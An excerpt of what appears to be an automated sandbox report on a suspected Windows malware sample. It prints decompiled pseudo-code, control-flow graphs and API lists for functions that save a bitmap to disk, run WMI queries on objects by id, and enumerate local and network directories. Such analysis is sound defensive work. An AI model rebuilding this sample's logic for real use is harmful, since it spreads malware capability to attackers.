            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Object$CapsCreateDeleteDevice$CompatibleSelectText$BitmapCallbackColorDispatcherDrawFillFontModePixelRectReleaseStockUser
            • String ID:
            • API String ID: 3972642514-0
            • Opcode ID: 8b67dc380df49cc9779721fe4ec72ca31c22e60ff5ea222c45933cf47a6c8560
            • Instruction ID: e2318f3c17d2cfd9c25bdb8990d9a8fa3d44b9d8359ae901cd5cdc7982a5c7c0
            • Opcode Fuzzy Hash: 8b67dc380df49cc9779721fe4ec72ca31c22e60ff5ea222c45933cf47a6c8560
            • Instruction Fuzzy Hash: 02510371E14215BFEB049FA4DD49FEE7BB9EF89321F100119FA11E22D2DB708900AB64
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B4424, Relevance: 13.7, APIs: 9, Instructions: 170filememoryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 65 9b4424-9b443e GetObjectW 66 9b45d4-9b45d8 65->66 67 9b4444-9b4456 65->67 68 9b4458-9b445a 67->68 69 9b445c-9b4462 67->69 70 9b4482-9b448f 68->70 69->70 71 9b4464-9b446a 69->71 72 9b4490-9b44c2 LocalAlloc 70->72 71->70 73 9b446c-9b4472 71->73 75 9b44cb-9b44fb GlobalAlloc 72->75 76 9b44c4-9b44c8 72->76 73->70 74 9b4474-9b4477 73->74 77 9b4479-9b447d 74->77 78 9b447f-9b4481 74->78 79 9b45d2-9b45d3 75->79 80 9b4501-9b4518 GetDIBits 75->80 76->75 77->72 78->70 79->66 80->79 81 9b451e-9b453b CreateFileW 80->81 81->79 82 9b4541-9b4585 WriteFile 81->82 83 9b4587-9b45a2 WriteFile 82->83 84 9b45a4-9b45a5 82->84 83->84 85 9b45a7-9b45bb WriteFile 83->85 86 9b45bd-9b45c3 call 9b4bee 84->86 85->86 87 9b45c5-9b45cc call 9b4bee GlobalFree 85->87 86->79 87->79
            C-Code - Quality: 77%
            			E009B4424(signed int __edx, void* _a4, struct HDC__* _a8, WCHAR* _a12) {
				long _v8;
				intOrPtr _v14;
				intOrPtr _v18;
				intOrPtr _v22;
				void _v24;
				signed int _v30;
				signed int _v32;
				signed short _v40;
				intOrPtr _v44;
				char _v48;
				int _t45;
				signed int _t48;
				void* _t57;
				long _t63;
				void* _t64;
				int _t74;
				int _t78;
				int _t80;
				int _t83;
				void* _t84;
				signed int _t96;
				void* _t104;
				int _t106;
				void* _t107;

				_t96 = __edx;
				_push( &_v48);
				_t106 = 0x18;
				_t45 = GetObjectW(_a4, _t106, ??);
				if(_t45 != 0) {
					_t48 = _v30 * _v32 & 0x0000ffff;
					if(_t48 != 1) {
						_t83 = 4;
						if(_t48 <= _t83) {
							L9:
							_push(0x28 + (1 << _t83) * 4);
							L10:
							_t107 = LocalAlloc(0x40, ??);
							 *_t107 = 0x28;
							 *((intOrPtr*)(_t107 + 4)) = _v44;
							 *(_t107 + 8) = _v40;
							 *((short*)(_t107 + 0xc)) = _v32;
							 *((short*)(_t107 + 0xe)) = _v30;
							_t57 = 0x18;
							if(_t83 < _t57) {
								 *(_t107 + 0x20) = 1 << _t83;
							}
							asm("cdq");
							 *((intOrPtr*)(_t107 + 0x10)) = 0;
							 *((intOrPtr*)(_t107 + 0x24)) = 0;
							_t63 = ( *((intOrPtr*)(_t107 + 4)) + 7 + (_t96 & 0x00000007) >> 3) * (_t83 & 0x0000ffff) *  *(_t107 + 8);
							 *(_t107 + 0x14) = _t63;
							_t64 = GlobalAlloc(0, _t63); // executed
							_t84 = _t64;
							if(_t84 == 0) {
								L21:
								return _t64;
							} else {
								_t64 = GetDIBits(_a8, _a4, 0,  *(_t107 + 8) & 0x0000ffff, _t84, _t107, 0);
								if(_t64 == 0) {
									goto L21;
								}
								_t64 = CreateFileW(_a12, 0xc0000000, 0, 0, 2, 0x80, 0); // executed
								_t104 = _t64;
								if(_t104 == 0xffffffff) {
									goto L21;
								}
								_v24 = 0x4d42;
								_v22 =  *_t107 +  *(_t107 + 0x14) +  *(_t107 + 0x20) * 4 + 0xe;
								_v18 = 0;
								_v14 =  *_t107 +  *(_t107 + 0x20) * 4 + 0xe;
								_t74 = WriteFile(_t104,  &_v24, 0xe,  &_v8, 0); // executed
								if(_t74 == 0) {
									L17:
									_push(_t104);
									L19:
									_t64 = E009B4BEE();
									goto L21;
								}
								_t78 = WriteFile(_t104, _t107, 0x28 +  *(_t107 + 0x20) * 4,  &_v8, 0); // executed
								if(_t78 != 0) {
									_t80 = WriteFile(_t104, _t84,  *(_t107 + 0x14),  &_v8, 0); // executed
									_push(_t104);
									if(_t80 != 0) {
										E009B4BEE();
										_t64 = GlobalFree(_t84); // executed
										goto L21;
									}
									goto L19;
								}
								goto L17;
							}
						}
						_t83 = 8;
						if(_t48 <= _t83) {
							goto L9;
						}
						_t83 = 0x10;
						if(_t48 <= _t83) {
							goto L9;
						}
						if(_t48 > _t106) {
							_t83 = 0x20;
							goto L9;
						}
						_t83 = _t106;
						_push(0x28);
						goto L10;
					}
					_t83 = 1;
					goto L9;
				}
				return _t45;
			}



























            0x009b4424
            0x009b442e
            0x009b4431
            0x009b4436
            0x009b443e
            0x009b4450
            0x009b4456
            0x009b445e
            0x009b4462
            0x009b4482
            0x009b448f
            0x009b4490
            0x009b4498
            0x009b449c
            0x009b44a5
            0x009b44ab
            0x009b44b2
            0x009b44ba
            0x009b44be
            0x009b44c2
            0x009b44c8
            0x009b44c8
            0x009b44d6
            0x009b44da
            0x009b44df
            0x009b44e8
            0x009b44ee
            0x009b44f1
            0x009b44f7
            0x009b44fb
            0x009b45d2
            0x00000000
            0x009b4501
            0x009b4510
            0x009b4518
            0x00000000
            0x00000000
            0x009b4530
            0x009b4536
            0x009b453b
            0x00000000
            0x00000000
            0x009b4546
            0x009b455c
            0x009b4561
            0x009b456f
            0x009b457d
            0x009b4585
            0x009b45a4
            0x009b45a4
            0x009b45bd
            0x009b45bd
            0x00000000
            0x009b45c2
            0x009b459a
            0x009b45a2
            0x009b45b2
            0x009b45b8
            0x009b45bb
            0x009b45c5
            0x009b45cc
            0x00000000
            0x009b45cc
            0x00000000
            0x009b45bb
            0x00000000
            0x009b45a2
            0x009b44fb
            0x009b4466
            0x009b446a
            0x00000000
            0x00000000
            0x009b446e
            0x009b4472
            0x00000000
            0x00000000
            0x009b4477
            0x009b4481
            0x00000000
            0x009b4481
            0x009b4479
            0x009b447b
            0x00000000
            0x009b447b
            0x009b4458
            0x00000000
            0x009b4458
            0x009b45d8

            APIs
            • GetObjectW.GDI32(00000000,00000018,?,00000000,?,?,?,?,?,?,009B48AE,?,00000000,00000000), ref: 009B4436
            • LocalAlloc.KERNEL32(00000040,00000001,00000000,00000000,?,?,?,?,?,?,009B48AE,?,00000000,00000000), ref: 009B4492
            • GlobalAlloc.KERNELBASE(00000000,?,?,?,?,?,?,?,009B48AE,?,00000000,00000000), ref: 009B44F1
            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 009B4510
            • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,009B48AE,?,00000000), ref: 009B4530
            • WriteFile.KERNELBASE(00000000,009B48AE,0000000E,?,00000000,?,?,?,?,?,?,009B48AE,?,00000000,00000000), ref: 009B457D
            • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,?,?,?,?,009B48AE,?,00000000,00000000), ref: 009B459A
            • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,?,?,?,?,009B48AE,?,00000000,00000000), ref: 009B45B2
            • GlobalFree.KERNEL32(00000000), ref: 009B45CC
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: File$Write$AllocGlobal$BitsCreateFreeLocalObject
            • String ID:
            • API String ID: 351847640-0
            • Opcode ID: 886c7d7106e412e85a88cc71e63ea497088c877ea0d03caaba68292d1a7efc19
            • Instruction ID: 5402d97acb97c2cdddbdca5a5344b2453fff9e2b049e5426f30097ebeb27b704
            • Opcode Fuzzy Hash: 886c7d7106e412e85a88cc71e63ea497088c877ea0d03caaba68292d1a7efc19
            • Instruction Fuzzy Hash: D551DD75600209AFD7209FA5CD44FAAB7FCEF49760F00841AFA86C7291D670E911EB24
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B2923, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 218COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 92 9b2923-9b2939 94 9b293b-9b293e 92->94 95 9b2943-9b295c 92->95 96 9b2b72-9b2b76 94->96 98 9b295e-9b2961 95->98 99 9b2966-9b2978 call 9b5327 95->99 98->96 102 9b297a-9b299e VariantInit 99->102 103 9b29a8-9b29c4 99->103 105 9b29a2-9b29a6 VariantClear 102->105 106 9b29ca-9b2a05 call 9b5e33 103->106 107 9b2b5f-9b2b68 103->107 105->103 106->107 113 9b2a0b-9b2a1e 106->113 112 9b2b6e-9b2b71 107->112 112->96 113->107 115 9b2a24-9b2a84 call 9b5e33 * 2 113->115 115->107 121 9b2a8a 115->121 122 9b2b3e-9b2b52 121->122 123 9b2b56-9b2b59 122->123 123->107 124 9b2a8f-9b2aa6 123->124 126 9b2b2f-9b2b3c VariantClear 124->126 127 9b2aac-9b2ab1 124->127 126->122 127->126 128 9b2ab3-9b2afd call 9b49d3 call 9b5e33 wsprintfW 127->128 134 9b2b29-9b2b2d VariantClear 128->134 135 9b2aff-9b2b26 call 9b49d3 128->135 134->126 135->134
            C-Code - Quality: 16%
            			E009B2923() {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				short _v30;
				char _v36;
				char _v44;
				intOrPtr _v52;
				char _v60;
				short _v64;
				char _v84;
				short _v88;
				short _v136;
				short _v140;
				char _v200;
				short _v456;
				void* _t57;
				void* _t58;
				intOrPtr* _t61;
				intOrPtr* _t68;
				void* _t70;
				intOrPtr* _t77;
				intOrPtr* _t79;
				intOrPtr* _t81;
				intOrPtr* _t83;
				int _t94;
				intOrPtr* _t97;
				intOrPtr* _t102;
				void* _t106;
				short _t110;
				intOrPtr* _t133;
				void* _t135;
				void* _t136;
				void* _t137;

				_push(0);
				_push(0);
				if( *0x9c12c0() >= 0) {
					_t57 =  *0x9c1320(0x9bd104, 0, 1, 0x9bd0f4,  &_v16); // executed
					if(_t57 >= 0) {
						_t58 = E009B5327(); // executed
						_t133 = __imp__#9;
						_t110 = 3;
						if(_t58 != 0) {
							__imp__#8( &_v44);
							_t102 = _v16;
							_v44 = _t110;
							_v36 = 0x40;
							 *((intOrPtr*)( *_t102 + 0x20))(_t102, L"__ProviderArchitecture", 0,  &_v44);
							 *_t133( &_v44);
						}
						_push( &_v28);
						_push(0x9bd134);
						_push(0x4401);
						_push(0);
						_push(0x9bd114);
						if( *0x9c1320() < 0) {
							L18:
							_t61 = _v28;
							 *((intOrPtr*)( *_t61 + 8))(_t61);
							 *0x9c12d4(); // executed
							return 0;
						} else {
							E009B5E33(0x9c0270, 0x24a, 0xe, 0x14,  &_v84);
							_t136 = _t135 + 0x14;
							_v64 = 0;
							_t68 = _v28;
							_push( &_v12);
							_push(_v16);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push( &_v84);
							_push(_t68); // executed
							if( *((intOrPtr*)( *_t68 + 0xc))() < 0) {
								goto L18;
							}
							_t70 =  *0x9c1084(_v12, 0xa, 0, 0, _t110, _t110, 0, 0); // executed
							if(_t70 < 0) {
								goto L18;
							}
							_v20 = 0;
							E009B5E33(0x9c0270, 0xc4, 0xe, 6,  &_v36);
							_v30 = 0;
							E009B5E33(0x9c0270, 0xb4f, 0xe, 0x3c,  &_v200);
							_t137 = _t136 + 0x28;
							_v140 = 0;
							_t77 = _v12;
							_push( &_v20);
							_push(0);
							_push(0x30);
							_push( &_v200);
							_push( &_v36);
							_push(_t77); // executed
							if( *((intOrPtr*)( *_t77 + 0x50))() < 0) {
								goto L18;
							}
							while(1) {
								_t79 = _v20;
								_v8 = 0;
								 *((intOrPtr*)( *_t79 + 0x10))(_t79, 0xffffffff, 1,  &_v24,  &_v8);
								if(_v8 == 0) {
									goto L18;
								}
								_t81 = _v24;
								_push(0);
								_push(0);
								_push( &_v60);
								_push(0);
								_push(L"id");
								_push(_t81);
								if( *((intOrPtr*)( *_t81 + 0x10))() >= 0 && _v60 == 8) {
									E009B49D3( &_v456, 0, 0x100);
									E009B5E33(0x9c0270, 0x40a, 0x10, 0x30,  &_v136);
									_v88 = 0;
									_t94 = wsprintfW( &_v456,  &_v136, _v52);
									_t137 = _t137 + 0x2c;
									if(_t94 != 0) {
										_t97 = _v12;
										 *((intOrPtr*)( *_t97 + 0x40))(_t97,  &_v456, 0, _v16, 0);
										E009B49D3( &_v456, 0, 0x80);
										_t137 = _t137 + 0xc;
									}
									 *_t133( &_v60);
								}
								_t83 = _v24;
								 *((intOrPtr*)( *_t83 + 8))(_t83);
								 *_t133( &_v60);
							}
							goto L18;
						}
					}
					_t106 = 2;
					return _t106;
				}
				return 1;
			}







































            0x009b292f
            0x009b2930
            0x009b2939
            0x009b2954
            0x009b295c
            0x009b2968
            0x009b296d
            0x009b2975
            0x009b2978
            0x009b297e
            0x009b2984
            0x009b298c
            0x009b2990
            0x009b299f
            0x009b29a6
            0x009b29a6
            0x009b29ab
            0x009b29ac
            0x009b29b1
            0x009b29b6
            0x009b29b7
            0x009b29c4
            0x009b2b5f
            0x009b2b5f
            0x009b2b65
            0x009b2b68
            0x00000000
            0x009b29ca
            0x009b29dc
            0x009b29e1
            0x009b29e9
            0x009b29ed
            0x009b29f0
            0x009b29f1
            0x009b29f9
            0x009b29fa
            0x009b29fb
            0x009b29fc
            0x009b29fd
            0x009b29fe
            0x009b29ff
            0x009b2a05
            0x00000000
            0x00000000
            0x009b2a16
            0x009b2a1e
            0x00000000
            0x00000000
            0x009b2a27
            0x009b2a3a
            0x009b2a41
            0x009b2a56
            0x009b2a5b
            0x009b2a63
            0x009b2a6a
            0x009b2a6d
            0x009b2a6e
            0x009b2a6f
            0x009b2a79
            0x009b2a7d
            0x009b2a7e
            0x009b2a84
            0x00000000
            0x00000000
            0x009b2b3e
            0x009b2b3e
            0x009b2b48
            0x009b2b53
            0x009b2b59
            0x00000000
            0x00000000
            0x009b2a8f
            0x009b2a95
            0x009b2a96
            0x009b2a97
            0x009b2a9a
            0x009b2a9b
            0x009b2aa0
            0x009b2aa6
            0x009b2ac0
            0x009b2ad6
            0x009b2ae0
            0x009b2af2
            0x009b2af8
            0x009b2afd
            0x009b2aff
            0x009b2b11
            0x009b2b21
            0x009b2b26
            0x009b2b26
            0x009b2b2d
            0x009b2b2d
            0x009b2b2f
            0x009b2b35
            0x009b2b3c
            0x009b2b3c
            0x00000000
            0x009b2b3e
            0x009b29c4
            0x009b2960
            0x00000000
            0x009b2960
            0x00000000

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: @$__ProviderArchitecture
            • API String ID: 0-691293667
            • Opcode ID: 893510f9c35d3b6bbd93219a52692cd2d9e15c23ec7f75d08e0bb37803f8a9cd
            • Instruction ID: 5bd19938cd482f6b493ff32cf6f982ba9ea9aba2d43ed94cb6242f82a51699cf
            • Opcode Fuzzy Hash: 893510f9c35d3b6bbd93219a52692cd2d9e15c23ec7f75d08e0bb37803f8a9cd
            • Instruction Fuzzy Hash: 69616E71A00219BBEB10DBA1CD49FEFBBBCEF89B14F004459F605EB191E6709A45CB60
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B32A6, Relevance: 12.2, APIs: 8, Instructions: 236COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 139 9b32a6-9b32bc 140 9b335f-9b3392 call 9b74df 139->140 141 9b32c2-9b32d0 call 9b4c10 139->141 147 9b32d2-9b32d4 140->147 148 9b3398-9b33d2 140->148 146 9b32d9-9b32dd 141->146 141->147 150 9b32df-9b32e7 call 9b4c02 146->150 151 9b32ec-9b330a 146->151 149 9b355a-9b3560 147->149 152 9b33d8-9b33ee call 9b5162 PathRemoveBackslashW PathIsDirectoryW 148->152 153 9b34c3-9b34c9 148->153 166 9b3559 150->166 155 9b330c-9b3314 151->155 156 9b3316-9b3325 call 9b494c 151->156 172 9b340e-9b3416 PathIsNetworkPathW 152->172 173 9b33f0-9b3409 PathAddBackslashW call 9b766a call 9b4999 152->173 157 9b34cb-9b34cf call 9b79c5 153->157 158 9b34d5-9b34db 153->158 155->147 155->156 156->150 181 9b3327-9b334d call 9b61f8 call 9b4c02 call 9b62a1 156->181 169 9b34d4 157->169 163 9b351b-9b3523 158->163 164 9b34dd-9b3513 call 9b7a73 * 5 158->164 167 9b3545-9b354e call 9b7430 163->167 168 9b3525 163->168 213 9b3518 164->213 166->149 184 9b3553-9b3556 167->184 179 9b353b-9b3543 168->179 180 9b3527-9b3537 call 9b575c 168->180 169->158 177 9b34bc-9b34c1 RevertToSelf 172->177 178 9b341c-9b3435 172->178 173->177 177->163 178->147 195 9b343b-9b345c PathAddBackslashW call 9b494c 178->195 179->167 179->180 196 9b3539 180->196 181->140 207 9b334f-9b3352 181->207 184->166 205 9b345e-9b3465 195->205 206 9b34b3 195->206 196->167 196->179 209 9b34a8-9b34b1 205->209 210 9b3467-9b34a5 call 9b6116 PathAddBackslashW call 9b6116 PathAddBackslashW call 9b766a call 9b49d3 205->210 206->177 211 9b335b 207->211 212 9b3354-9b3359 207->212 209->205 209->206 210->209 211->140 212->140 213->163
            C-Code - Quality: 87%
            			E009B32A6() {
				WCHAR* _v8;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				char _v24;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				char* _v68;
				WCHAR* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				WCHAR* _t52;
				intOrPtr _t55;
				void* _t57;
				WCHAR* _t73;
				WCHAR* _t74;
				WCHAR* _t79;
				WCHAR* _t81;
				intOrPtr _t82;
				intOrPtr _t97;
				signed int _t103;
				intOrPtr* _t105;
				signed int _t106;
				WCHAR* _t113;
				WCHAR* _t119;
				void* _t122;
				short _t123;
				void* _t125;
				WCHAR* _t126;
				WCHAR* _t129;
				void* _t130;
				void* _t131;
				WCHAR* _t134;

				_t125 = 1;
				_t129 = 0;
				_t134 =  *0x9c230c; // 0x0
				if(_t134 == 0) {
					L12:
					 *0x9c1d88 = 0;
					 *0x9c1d8c = 0;
					 *0x9c1d90 = 0;
					 *0x9c1d94 = 0;
					 *0x9c1d84 = 0; // executed
					_t52 = E009B74DF(__eflags,  &_v36, 0, 0, E009B3561); // executed
					_t131 = _t130 + 0x10;
					__eflags = _t52;
					if(_t52 == 0) {
						L2:
						return 0;
					}
					_v84 = 0;
					_v80 = E009B2D36;
					_v76 = E009B390F;
					_v72 = 0;
					_v68 =  &_v36;
					_v60 = 0;
					_v56 = 0;
					_v52 = 0;
					_v48 = 0;
					_v44 = E009B2D02;
					_v40 = E009B38A7;
					__eflags =  *0x9c230c; // 0x0
					if(__eflags == 0) {
						__eflags =  *0x9c2308; // 0x1
						if(__eflags != 0) {
							E009B79C5( &_v84); // executed
						}
						__eflags =  *0x9c2304; // 0x1
						if(__eflags != 0) {
							E009B7A73( &_v84, _t125, 0); // executed
							E009B7A73( &_v84, 4, 0); // executed
							E009B7A73( &_v84, 5, 0); // executed
							E009B7A73( &_v84, 3, 0); // executed
							E009B7A73( &_v84, 2, 0); // executed
						}
						L28:
						_t55 =  *0x9c1d94; // 0x0
						__eflags = _t55 - _v48;
						if(__eflags > 0) {
							L33:
							E009B7430( &_v36, 0x9c1d84); // executed
							__eflags = 0;
							_t57 = 1;
							L34:
							return _t57;
						}
						if(__eflags >= 0) {
							L32:
							_t55 =  *0x9c1d90; // 0x8a
							__eflags = _t55 - _v52;
							if(_t55 < _v52) {
								do {
									goto L30;
								} while (__eflags < 0);
								if(__eflags > 0) {
									goto L33;
								}
								goto L32;
							}
							goto L33;
						}
						L30:
						E009B575C(_t55, 0x64);
						_t55 =  *0x9c1d94; // 0x0
						__eflags = _t55 - _v48;
					}
					E009B5162(_t106, __eflags);
					PathRemoveBackslashW(_t129);
					_t73 = PathIsDirectoryW(_t129);
					_push(_t129);
					__eflags = _t73;
					if(_t73 == 0) {
						_t74 = PathIsNetworkPathW();
						__eflags = _t74;
						if(_t74 == 0) {
							L23:
							RevertToSelf();
							goto L28;
						}
						_t79 =  *0x9c119c(_t129, _t125,  &_v16, 0xffffffff,  &_v8,  &_v24, 0);
						__eflags = _t79;
						if(_t79 != 0) {
							goto L2;
						}
						PathAddBackslashW(_t129);
						_t105 = _v16;
						_t81 = E009B494C(0x800);
						_t113 = _v8;
						_t126 = _t81;
						_t82 = 0;
						_v12 = 0;
						__eflags = _t113;
						if(_t113 == 0) {
							L22:
							 *0x9c116c(_v16);
							goto L23;
						} else {
							goto L19;
						}
						do {
							L19:
							__eflags =  *(_t105 + 4) & 0x80000003;
							if(__eflags == 0) {
								E009B6116(__eflags, _t126, _t129);
								PathAddBackslashW(_t126);
								E009B6116(__eflags, _t126,  *_t105);
								PathAddBackslashW(_t126);
								E009B766A(_t126,  &_v84);
								E009B49D3(_t126, 0, 0x800);
								_t113 = _v8;
								_t131 = _t131 + 0x14;
								_t82 = _v12;
							}
							_t82 = _t82 + 1;
							_t105 = _t105 + 0xc;
							_v12 = _t82;
							__eflags = _t82 - _t113;
						} while (_t82 < _t113);
						goto L22;
					}
					PathAddBackslashW();
					E009B766A(_t129,  &_v84);
					E009B4999(_t129);
					goto L23;
				}
				_t127 = E009B4C10( &_v20);
				if(_t96 != 0) {
					__eflags = _v20 - 2;
					if(_v20 > 2) {
						_t119 =  *0x9c22fc; // 0x0
						__eflags = _t119;
						_t97 =  *0x9c22d8; // 0x0
						_t122 = 1;
						_t98 =  !=  ? _t122 : _t97;
						 *0x9c22d8 =  !=  ? _t122 : _t97;
						__eflags =  *0x9c2300; // 0x0
						if(__eflags == 0) {
							L7:
							_t129 = E009B494C(0x208);
							__eflags = _t129;
							if(_t129 == 0) {
								goto L4;
							}
							E009B61F8(_t129,  *((intOrPtr*)(_t127 + 8)));
							E009B4C02(_t127);
							_t103 = E009B62A1(_t129);
							_t130 = _t130 + 0x10;
							_t125 = 1;
							_t106 =  *(_t129 + _t103 * 2 - 2) & 0x0000ffff;
							_t123 = 0x5c;
							__eflags = _t106 - _t123;
							if(__eflags != 0) {
								__eflags = _t106 - 0x22;
								if(__eflags != 0) {
									_t129[_t103] = _t123;
								} else {
									 *(_t129 + _t103 * 2 - 2) = _t123;
								}
							}
							goto L12;
						}
						 *0x9c22d8 = 0;
						__eflags = _t119;
						if(_t119 != 0) {
							goto L2;
						}
						goto L7;
					}
					L4:
					E009B4C02(_t127);
					_t57 = 0;
					goto L34;
				}
				goto L2;
			}










































            0x009b32b3
            0x009b32b4
            0x009b32b6
            0x009b32bc
            0x009b335f
            0x009b3368
            0x009b3370
            0x009b3376
            0x009b337c
            0x009b3382
            0x009b3388
            0x009b338d
            0x009b3390
            0x009b3392
            0x009b32d2
            0x00000000
            0x009b32d2
            0x009b339b
            0x009b339e
            0x009b33a5
            0x009b33ac
            0x009b33af
            0x009b33b2
            0x009b33b5
            0x009b33b8
            0x009b33bb
            0x009b33be
            0x009b33c5
            0x009b33cc
            0x009b33d2
            0x009b34c3
            0x009b34c9
            0x009b34cf
            0x009b34d4
            0x009b34d5
            0x009b34db
            0x009b34e3
            0x009b34ef
            0x009b34fb
            0x009b3507
            0x009b3513
            0x009b3518
            0x009b351b
            0x009b351b
            0x009b3520
            0x009b3523
            0x009b3545
            0x009b354e
            0x009b3553
            0x009b3556
            0x009b3559
            0x00000000
            0x009b3559
            0x009b3525
            0x009b353b
            0x009b353b
            0x009b3540
            0x009b3543
            0x009b3527
            0x00000000
            0x00000000
            0x009b3539
            0x00000000
            0x00000000
            0x00000000
            0x009b3539
            0x00000000
            0x009b3543
            0x009b3527
            0x009b3529
            0x009b352e
            0x009b3534
            0x009b3534
            0x009b33d8
            0x009b33de
            0x009b33e5
            0x009b33eb
            0x009b33ec
            0x009b33ee
            0x009b340e
            0x009b3414
            0x009b3416
            0x009b34bc
            0x009b34bc
            0x00000000
            0x009b34bc
            0x009b342d
            0x009b3433
            0x009b3435
            0x00000000
            0x00000000
            0x009b343c
            0x009b3442
            0x009b344a
            0x009b3450
            0x009b3453
            0x009b3455
            0x009b3457
            0x009b345a
            0x009b345c
            0x009b34b3
            0x009b34b6
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x009b345e
            0x009b345e
            0x009b345e
            0x009b3465
            0x009b3469
            0x009b3471
            0x009b347a
            0x009b3482
            0x009b348d
            0x009b349a
            0x009b349f
            0x009b34a2
            0x009b34a5
            0x009b34a5
            0x009b34a8
            0x009b34a9
            0x009b34ac
            0x009b34af
            0x009b34af
            0x00000000
            0x009b345e
            0x009b33f0
            0x009b33fb
            0x009b3401
            0x00000000
            0x009b3406
            0x009b32cb
            0x009b32d0
            0x009b32d9
            0x009b32dd
            0x009b32ec
            0x009b32f2
            0x009b32f4
            0x009b32fb
            0x009b32fc
            0x009b32ff
            0x009b3304
            0x009b330a
            0x009b3316
            0x009b3320
            0x009b3323
            0x009b3325
            0x00000000
            0x00000000
            0x009b332b
            0x009b3331
            0x009b3337
            0x009b333c
            0x009b3341
            0x009b3342
            0x009b3349
            0x009b334a
            0x009b334d
            0x009b334f
            0x009b3352
            0x009b335b
            0x009b3354
            0x009b3354
            0x009b3354
            0x009b3352
            0x00000000
            0x009b334d
            0x009b330c
            0x009b3312
            0x009b3314
            0x00000000
            0x00000000
            0x00000000
            0x009b3314
            0x009b32df
            0x009b32e0
            0x009b32e5
            0x00000000
            0x009b32e5
            0x00000000

            APIs
            • PathRemoveBackslashW.SHLWAPI(00000000,?,?,00000000,00000000), ref: 009B33DE
            • PathIsDirectoryW.SHLWAPI(00000000), ref: 009B33E5
            • PathAddBackslashW.SHLWAPI(00000000,?,?,00000000,00000000), ref: 009B33F0
            • RevertToSelf.ADVAPI32(?,?,00000000,00000000), ref: 009B34BC
              • Part of subcall function 009B4C10: GetCommandLineW.KERNEL32(0000000E,?,009B13D7,?,00000010,009C0270,?,?,009B1B06,?,009C0270,000002DF,0000000F,0000000E,?), ref: 009B4C16
              • Part of subcall function 009B4C10: CommandLineToArgvW.SHELL32(00000000,?,009B13D7,?,00000010,009C0270,?,?,009B1B06,?,009C0270,000002DF,0000000F,0000000E,?), ref: 009B4C1D
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Path$BackslashCommandLine$ArgvDirectoryRemoveRevertSelf
            • String ID:
            • API String ID: 332453508-0
            • Opcode ID: 5e148bd27f3ccf9e0a98f87db1de86940834b66f6490decd861e12d8175c87d9
            • Instruction ID: ffd1c0825d283ebcd5e224c2fdf2c4602b322172373d5e02cabae57f2771f595
